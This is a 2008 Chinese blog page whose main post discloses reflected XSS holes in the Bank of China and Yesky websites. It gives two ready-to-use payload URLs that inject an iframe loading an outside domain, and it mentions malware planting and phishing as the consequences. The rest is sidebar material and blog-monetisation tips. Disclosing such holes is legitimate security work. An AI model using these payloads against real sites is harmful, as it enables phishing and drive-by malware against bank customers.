1. 公告

    • 黑夜给了我黑色的眼睛去寻找光明,阳光给了我明亮的眼睛我却是去寻找黑暗,所以我只有在夜里才出现真实的自己。(菩提本不树,明镜亦非台,本来无一物,何处染尘埃。)

  2. 写作时间

    << 2008-12 >>

    Sun

    Mon

    Tue

    Wed

    Thu

    Fri

    Sat

    1

    2

    3

    4

    5

    6

    7

    8

    9

    10

    11

    12

    13

    14

    15

    16

    17

    18

    19

    20

    21

    22

    23

    24

    25

    26

    27

    28

    29

    30

    31

  3. 原创下载

  4. 最新文章

  5. 最新评论

  6. 文章归档

  7. Statistics

    • 文章总数:194
    • 评论总数:67
    • 引用总数:0
    • 浏览总数:240437
    • 留言总数:0
    • 当前样式:4u-HK
    • 当前语言:zh-CN

  8. 友情链接

  9. 反向链接

天极和中国银行官方出现XSS漏洞

http://www.boc.cn/cn/common/fourth.jsp?category="><iframe%20src=http://popsky.org/>

http://search.yesky.com/jsp/hint.jsp?type=1&wd=%3C%3E%3C%3E%3Ciframe+src%3D%22http%3A%2F%2Fpopsky.org%22%3E

第一个为中国银行的

第二个为天极的...搜索部分限制的不够严格

利用后果:

构造js脚本或者html代码可以实现网页挂马!

防范措施:注意不要从其他的网站进入了,否则中马率会提升

防止钓鱼攻击哦...

您或许还对以下的内容感兴趣:

如果您拥有一个BLOG,如果您的BLOG的PV/IP/PR还算不错,如果您打算用您所拥有的BLOG来赚钱,那么我来告诉您几个赚钱的方法:

1、透过 Google AdSense 使您的BLOG产生收益

2、您还可以通过申请TextLinkAds投放者来直接出售链接位从而产生收入。